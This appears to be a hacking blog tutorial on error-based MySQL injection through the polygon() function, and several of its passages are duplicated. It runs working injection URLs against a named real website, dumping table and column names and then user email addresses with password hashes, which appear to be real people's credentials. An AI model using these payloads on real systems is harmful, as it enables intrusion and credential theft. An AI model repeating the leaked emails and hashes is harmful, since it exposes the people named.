05.14
Unknown
~~~::::Benzi Tutorials::::~~~~
Maybe some of you heard, or maybe not, but theres a new type of error based in mysql.
discoverd about a week ago.
the dude who discoverd this called spari, which in case a dear friend of mine.
lets start.
this method based on the function polygon().
in a nutshell, this function constructs geometry collection.
the vuln thing about it, that it can only work with the function point().
for example-
Code:
SELECT polygon(point(53,12));not really exciting, ah?
for those who know a bit geometry, it goes like point(x,y).
now look whats happend when we dont use point()-
Code:
SELECT polygon(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing
we get an error on our x argument, 53.
so lets think a bit.
if the error returns our string input as an string output, what would happend if we try to run a query?
boom! 5.5.38-35.2.
so lets think a bit.
if the error returns our string input as an string output, what would happend if we try to run a query?
Code:
SELECT polygon((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing
now lets try that on a real site-
conditions:
mysql_error on.
lets get the version-
5.1.73-log
conditions:
mysql_error on.
lets get the version-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))
nice, but can we extract more?
hell yeah.
we will be using this to get tables-
hell yeah.
we will be using this to get tables-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmessages,pernodnews,pernodpolls,pernodtopics,pernoduser
im interested in the table pernoduser, lets get columns-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted
and dump the table-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.uk:795b087b2ceb3482dc9956eb8f126ea3
and we get the data.
to overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".
hope you learned something
to overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".
hope you learned something
Posted in
0 komentar:
Posting Komentar